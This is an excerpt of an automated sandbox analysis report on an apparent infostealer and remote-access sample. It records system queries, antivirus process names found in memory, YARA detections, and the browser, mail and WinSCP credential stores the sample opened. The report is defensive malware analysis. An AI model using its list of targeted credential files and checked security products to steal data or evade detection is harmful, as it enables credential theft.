Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: GetLocaleInfoA, 13_2_00417A20
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 15_2_00EE8572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 15_2_00EE6854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 15_2_00EE9310
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\aymtmquJ.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\AppVClient.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTFF1C.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTFF2C.tmp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF920C GetLocalTime, 0_2_02CF920C
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFB78C GetVersionExA, 0_2_02CFB78C
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1832128642.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Native_neworigin.exe PID: 3976, type: MEMORYSTR
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b66216.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3f3c190.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3ecc190.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab6216.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70f08.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e75570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee5570.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e0950.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b6711e.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70f08.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.3.Native_neworigin.exe.8e7630.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.5010000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab6216.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.Native_neworigin.exe.78d220.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3ecc190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab711e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.59e0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b66216.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee6478.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.5010000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.3.Native_neworigin.exe.8e7630.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b6711e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e76478.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e0950.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab711e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1632645650.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1630416908.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1845358079.0000000003E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1748806295.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1781418766.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1852623141.0000000005010000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Native_neworigin.exe PID: 3976, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1832128642.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Native_neworigin.exe PID: 3976, type: MEMORYSTR
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b66216.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3f3c190.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3ecc190.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab6216.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70f08.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e75570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee5570.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e0950.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b6711e.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70f08.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.3.Native_neworigin.exe.8e7630.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.5010000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab6216.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.Native_neworigin.exe.78d220.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3ecc190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab711e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.59e0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b66216.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee6478.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.5010000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.3.Native_neworigin.exe.8e7630.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b6711e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e76478.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e0950.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab711e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1632645650.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1630416908.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1845358079.0000000003E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1748806295.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1781418766.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1852623141.0000000005010000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY